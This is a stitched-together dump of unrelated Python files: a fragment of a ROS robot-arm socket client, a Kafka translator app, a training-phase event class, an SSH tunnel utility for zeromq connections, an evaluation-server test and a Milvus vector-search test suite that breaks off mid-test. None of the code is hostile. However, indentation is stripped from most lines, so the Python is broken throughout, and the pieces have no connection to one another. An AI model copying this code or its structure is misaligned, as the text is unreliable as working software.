socket_client_arm_state(feedback)
print("shutdown")
#Arm_feedback = TCP.Is_busy(feedback)
            ##--------------- socket transmission of arm commands end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5 ## set the initial mode state
t = threading.Thread(target=thread_test)
    t.start() # start the worker thread
socket_server()
t.join()
# Ctrl+K Ctrl+C   Add line comment
# Ctrl+K Ctrl+U   Remove line comment
# Ctrl+] / Ctrl+[   Indent / outdent line
|
app.py
|
#!/bin/python
import logging
import os
from multiprocessing import Process
from controller.translatorcontroller import translatorapp
from kafkawrapper.translatorconsumer import consume
from kafkawrapper.transnmtconsumer import consume_nmt
from anuvaad_auditor.loghandler import log_exception
log = logging.getLogger('file')
app_host = os.environ.get('ANU_ETL_TRANSLATOR_HOST', '0.0.0.0')
app_port = os.environ.get('ANU_ETL_TRANSLATOR_PORT', 5001)
# Starts the Kafka consumers in separate processes
def start_consumer():
with translatorapp.test_request_context():
try:
trans_consumer_process = Process(target=consume)
trans_consumer_process.start()
trans_nmt_consumer_process = Process(target=consume_nmt)
trans_nmt_consumer_process.start()
except Exception as e:
log_exception("Exception while starting the Translator kafka consumers: " + str(e), None, e)
if __name__ == '__main__':
start_consumer()
translatorapp.run(host=app_host, port=app_port, threaded=True)
|
algo_phase.py
|
import logging
import queue
import threading
import typing
class AlgoPhase(object):
"""Simple training/testing/evaluation class"""
def __init__(self, model, listeners, phase=None, event_processor=None):
self._phase = phase
self._model = model
self._iteration = 0
self.listeners = listeners
self.listeners += self.onevent
self._lock = threading.RLock()
if event_processor is not None:
self.input_event_processor = event_processor
else:
self.input_event_processor = self.onevent
def process(self, data):
with self._lock:
self._iteration += 1
iteration = self._iteration
self.listeners({'type': 'before_iteration', 'model': self._model, 'phase': self._phase, 'iteration': iteration, 'model_input': data})
logging.getLogger(__name__).debug("Phase " + str(self._phase) + " iteration " + str(iteration))
model_output = self._model(data)
self.listeners({'type': 'after_iteration', 'model': self._model, 'phase': self._phase, 'iteration': iteration, 'model_input': data, 'model_output': model_output})
def onevent(self, event):
if event['type'] == 'data' and 'phase' in event and event['phase'] == self._phase:
self.process(event['data'])
class AlgoPhaseEventsOrder(object):
def __init__(self, phases: typing.List[typing.Tuple[str, int]], listeners, phase_suffix='_unordered'):
self.phases = phases
self.listeners = listeners
self.listeners += self.listener
self.phase_suffix = phase_suffix
self._lock = threading.RLock()
self.event_queues = {p[0]: queue.Queue() for p in phases}
self.phases_queue = queue.Queue()
self.phases_count = {p[0]: 0 for p in phases}
self.thread = None
def listener(self, event):
if isinstance(event, dict) and 'type' in event and event['type'] == 'after_iteration' and 'phase' in event:
if event['phase'].endswith(self.phase_suffix):
raise Exception("after_iteration events cannot be unordered")
self.start_generator()
with self._lock:
phase = event['phase']
self.phases_count[phase] += 1
ind = [p[0] for p in self.phases].index(phase)
if self.phases_count[phase] == self.phases[ind][1]:
self.phases_count[phase] = 0
self.phases_queue.put(self.phases[(ind + 1) % len(self.phases)][0])
elif isinstance(event, dict) and 'type' in event and event['type'] == 'data' and 'phase' in event and event['phase'].endswith(self.phase_suffix):
self.start_generator()
self.event_queues[event['phase'].replace(self.phase_suffix, '')].put(event)
def start_generator(self):
with self._lock:
if self.thread is None:
self.phases_queue.put(self.phases[0][0])
def events_generator():
while True:
phase = self.phases_queue.get()
if phase is None:
break
for i in range(self.phases[[p[0] for p in self.phases].index(phase)][1]):
event = self.event_queues[phase].get().copy()
event['phase'] = phase
self.listeners(event)
self.event_queues[phase].task_done()
self.phases_queue.task_done()
self.thread = threading.Thread(target=events_generator, daemon=True)
self.thread.start()
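# Minimal usage sketch (not part of the original module): `listeners` is only
# assumed to be a callable registry that supports `+=`, so a tiny stand-in is
# defined below purely for illustration.
if __name__ == '__main__':
    class _Listeners(object):
        """Calls every registered callback with each event it receives."""
        def __init__(self):
            self._callbacks = []

        def __iadd__(self, callback):
            self._callbacks.append(callback)
            return self

        def __call__(self, event):
            for callback in self._callbacks:
                callback(event)

    logging.basicConfig(level=logging.DEBUG)
    listeners = _Listeners()
    train_phase = AlgoPhase(model=lambda batch: batch * 2, listeners=listeners, phase='train')
    # Publishing a 'data' event for the 'train' phase drives one iteration,
    # which in turn emits 'before_iteration' and 'after_iteration' events.
    listeners({'type': 'data', 'phase': 'train', 'data': 21})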
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
Authors
-------
* Min RK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os, sys, atexit
import signal
import socket
from multiprocessing import Process
from getpass import getpass, getuser
import warnings
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import paramiko
except ImportError:
paramiko = None
else:
from .forward import forward_tunnel
try:
from IPython.external import pexpect
except ImportError:
pexpect = None
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
# select_random_ports copied from IPython.parallel.util
_random_ports = set()
def select_random_ports(n):
"""Selects and return n random ports that are available."""
ports = []
for i in range(n):
sock = socket.socket()
sock.bind(('', 0))
while sock.getsockname()[1] in _random_ports:
sock.close()
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock)
for i, sock in enumerate(ports):
port = sock.getsockname()[1]
sock.close()
ports[i] = port
_random_ports.add(port)
return ports
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
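# Illustrative check (the server name and prompt below are assumptions, not
# part of this module):
#
#   if not try_passwordless_ssh('user@login.example.com', keyfile=None):
#       password = getpass("user@login.example.com's password: ")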
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
p = pexpect.spawn(cmd)
while True:
try:
p.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavaliable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
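# Hypothetical usage (the host names and ports are made up for illustration):
#
#   import zmq
#   ctx = zmq.Context()
#   sock = ctx.socket(zmq.REQ)
#   # reach tcp://10.0.0.5:5555 as seen from the ssh host login.example.com:
#   tunnel = tunnel_connection(sock, 'tcp://10.0.0.5:5555', 'user@login.example.com')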
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel): The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
if ':' in server:
server, port = server.split(':')
ssh += " -p %s" % port
cmd = "%s -f -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh, lport, remoteip, rport, server, timeout)
tunnel = pexpect.spawn(cmd)
failed = False
while True:
try:
tunnel.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
print (tunnel.exitstatus)
print (tunnel.before)
print (tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
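# Illustrative call (assumed values): forward local port 10101 to port 5555 on
# the ssh server itself, letting the tunnel close after 60 idle seconds:
#
#   pid = openssh_tunnel(10101, 5555, 'user@login.example.com', timeout=60)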
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon=False
p.start()
atexit.register(_shutdown_process, p)
return p
def _shutdown_process(p):
if p.is_alive():
p.terminate()
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print ('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# Don't let SIGINT kill the tunnel subprocess
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print ('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception as e:
print ("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
|
evaluation_server_test.py
|
from io import StringIO
from threading import Thread
from unittest import TestCase
import requests
from deduplication.classifier_evaluator import ClassifierEvaluator
from deduplication.evaluation_server import EvaluationServer
class EvaluationServerTest(TestCase):
def setUp(self):
self.server = EvaluationServer(ClassifierEvaluator(), host_port=("127.0.0.1", 0))
Thread(target=self.server.serve_forever).start()
def tearDown(self):
self.server.shutdown()
def test(self):
url = "http://127.0.0.1:" + str(self.server.server_port)
full_data_ids = {"1", "2", "3", "4", "5", "6", "7", "8", "9", "0"}
id_duplicates = {frozenset({"1", "2"}), frozenset({"3", "4"}), frozenset({"5", "6"})}
self.server.classifier_evaluator.prepare(full_data_ids, id_duplicates)
files = {'file': StringIO('"id1";"id2"\n1;2\n4;5\n')}
response = requests.post(url, files=files)
self.assertEqual(200, response.status_code)
self.assertTrue("precision" in response.text)
self.assertTrue("0.5" in response.text)
self.assertTrue("recall" in response.text)
self.assertTrue("0.33" in response.text)
|
test_search_20.py
|
import pytest
from time import sleep
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common.constants import *
prefix = "search_collection"
search_num = 10
max_dim = ct.max_dim
epsilon = ct.epsilon
gracefulTime = ct.gracefulTime
default_nb = ct.default_nb
default_nb_medium = ct.default_nb_medium
default_nq = ct.default_nq
default_dim = ct.default_dim
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_int64_field_name = ct.default_int64_field_name
default_float_field_name = ct.default_float_field_name
default_bool_field_name = ct.default_bool_field_name
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
uid = "test_search"
nq = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, _ = gen_search_vectors_params(field_name, entities, default_top_k, nq)
# default_binary_query, _ = gen_search_vectors_params(binary_field_name, binary_entities, default_top_k, nq)
class TestCollectionSearchInvalid(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function", params=ct.get_invalid_vectors)
def get_invalid_vectors(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for field")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_value(self, request):
if not isinstance(request.param, str):
pytest.skip("field value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_limit(self, request):
if isinstance(request.param, int) and request.param >= 0:
pytest.skip("positive int is valid type for limit")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for expr")
if request.param is None:
pytest.skip("None is valid for expr")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_value(self, request):
if not isinstance(request.param, str):
pytest.skip("expression value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition(self, request):
if request.param == []:
pytest.skip("empty is valid for partition")
if request.param is None:
pytest.skip("None is valid for partition")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_output_fields(self, request):
if request.param == []:
pytest.skip("empty is valid for output_fields")
if request.param is None:
pytest.skip("None is valid for output_fields")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_travel_timestamp(self, request):
if request.param == 9999999999:
pytest.skip("9999999999 is valid for travel timestamp")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_guarantee_timestamp(self, request):
if request.param == 9999999999:
pytest.skip("9999999999 is valid for guarantee_timestamp")
yield request.param
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_connection(self):
"""
target: test search without connection
method: create and delete connection, then search
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. remove connection
log.info("test_search_no_connection: removing connection")
self.connection_wrap.remove_connection(alias='default')
log.info("test_search_no_connection: removed connection")
# 3. search without connection
log.info("test_search_no_connection: searching without connection")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_collection(self):
"""
target: test the scenario which search the non-exist collection
method: 1. create collection
2. drop collection
3. search the dropped collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. Drop collection
collection_w.drop()
# 3. Search without collection
log.info("test_search_no_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s doesn't exist!" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_missing(self):
"""
target: test search with incomplete parameters
method: search with incomplete parameters
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection with missing parameters
log.info("test_search_param_missing: Searching collection %s "
"with missing parameters" % collection_w.name)
try:
collection_w.search()
except TypeError as e:
assert "missing 4 required positional arguments: 'data', " \
"'anns_field', 'param', and 'limit'" in str(e)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_vectors(self, get_invalid_vectors):
"""
target: test search with invalid parameter values
method: search with invalid data
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_vectors = get_invalid_vectors
log.info("test_search_param_invalid_vectors: searching with "
"invalid vectors: {}".format(invalid_vectors))
collection_w.search(invalid_vectors, default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`search_data` value {} is illegal".format(invalid_vectors)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_dim(self):
"""
target: test search with invalid parameter values
method: search with invalid dim
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid dim
log.info("test_search_param_invalid_dim: searching with invalid dim")
wrong_dim = 129
vectors = [[random.random() for _ in range(wrong_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The dimension of query entities "
"is different from schema"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_type(self, get_invalid_fields_type):
"""
target: test search with invalid parameter type
method: search with invalid field type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_type
log.info("test_search_param_invalid_field_type: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`anns_field` value {} is illegal".format(invalid_search_field)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_value(self, get_invalid_fields_value):
"""
target: test search with invalid parameter values
method: search with invalid field value
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_value
log.info("test_search_param_invalid_field_value: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Field %s doesn't exist in schema"
% invalid_search_field})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_metric_type(self, get_invalid_metric_type):
"""
target: test search with invalid parameter values
method: search with invalid metric type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid metric_type
log.info("test_search_param_invalid_metric_type: searching with invalid metric_type")
invalid_metric = get_invalid_metric_type
search_params = {"metric_type": invalid_metric, "params": {"nprobe": 10}}
collection_w.search(vectors[:default_nq], default_search_field, search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_invalid_params_type(self, index, params):
"""
target: test search with invalid search params
method: test search with invalid params type
expected: raise exception and report the error
"""
if index == "FLAT":
pytest.skip("skip in FLAT index")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
is_index=True)[0:4]
# 2. create index and load
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
invalid_search_params = cf.gen_invaild_search_params_type()
message = "Search params check failed"
for invalid_search_param in invalid_search_params:
if index == invalid_search_param["index_type"]:
search_params = {"metric_type": "L2", "params": invalid_search_param["search_params"]}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 0,
"err_msg": message})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_limit_type(self, get_invalid_limit):
"""
target: test search with invalid limit type
method: search with invalid limit type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_limit = get_invalid_limit
log.info("test_search_param_invalid_limit_type: searching with "
"invalid limit: %s" % invalid_limit)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
invalid_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`limit` value %s is illegal" % invalid_limit})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("limit", [0, 16385])
def test_search_param_invalid_limit_value(self, limit):
"""
target: test search with invalid limit value
method: search with invalid limit: 0 and maximum
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid limit (topK)
log.info("test_search_param_invalid_limit_value: searching with "
"invalid limit (topK) = %s" % limit)
err_msg = "limit %d is too large!" % limit
if limit == 0:
err_msg = "`limit` value 0 is illegal"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_type(self, get_invalid_expr_type):
"""
target: test search with invalid parameter type
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_type
log.info("test_search_param_invalid_expr_type: searching with "
"invalid expr: {}".format(invalid_search_expr))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The type of expr must be string ,"
"but {} is given".format(type(invalid_search_expr))})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_value(self, get_invalid_expr_value):
"""
target: test search with invalid parameter values
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_value
log.info("test_search_param_invalid_expr_value: searching with "
"invalid expr: %s" % invalid_search_expr)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid expression %s"
% invalid_search_expr})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_invalid_type(self, get_invalid_partition):
"""
target: test search invalid partition
method: search with invalid partition type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search the invalid partition
partition_name = get_invalid_partition
err_msg = "`partition_name_array` value {} is illegal".format(partition_name)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, partition_name,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_invalid_type(self, get_invalid_output_fields):
"""
target: test search with output fields
method: search with invalid output_field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search
log.info("test_search_with_output_fields_invalid_type: Searching collection %s" % collection_w.name)
output_fields = get_invalid_output_fields
err_msg = "`output_fields` value {} is illegal".format(output_fields)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_collection(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release collection
3. search the released collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. release collection
collection_w.release()
# 3. Search the released collection
log.info("test_search_release_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s was not loaded "
"into memory" % collection_w.name})
@pytest.mark.tags(CaseLabel.L2)
def test_search_release_partition(self):
"""
        target: test the scenario of searching a released partition
method: 1. create collection
2. release partition
3. search the released partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 10, partition_num)[0]
par = collection_w.partitions
par_name = par[partition_num].name
# 2. release partition
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par_name])
# 3. Search the released partition
log.info("test_search_release_partition: Searching specifying the released partition")
limit = 10
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "partition has been released"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_collection(self):
"""
        target: test search with an empty collection
method: 1. search the empty collection before load
2. search the empty collection after load
3. search collection with data inserted but not load again
expected: 1. raise exception if not loaded
2. return topk=0 if loaded
3. return topk successfully
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection without data before load
log.info("test_search_with_empty_collection: Searching empty collection %s"
% collection_w.name)
err_msg = "collection" + collection_w.name + "was not loaded into memory"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, timeout=1,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
# 3. search collection without data after load
collection_w.load()
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
# 4. search with data inserted but not load again
data = cf.gen_default_dataframe_data(nb=2000)
insert_res, _ = collection_w.insert(data)
        # TODO: replace sleep with search guarantee_timestamp when issue #10101 is fixed
sleep(1)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_res.primary_keys,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_partition_deleted(self):
"""
target: test search deleted partition
method: 1. create a collection with partitions
2. delete a partition
3. search the deleted partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
# 2. delete partitions
log.info("test_search_partition_deleted: deleting a partition")
par = collection_w.partitions
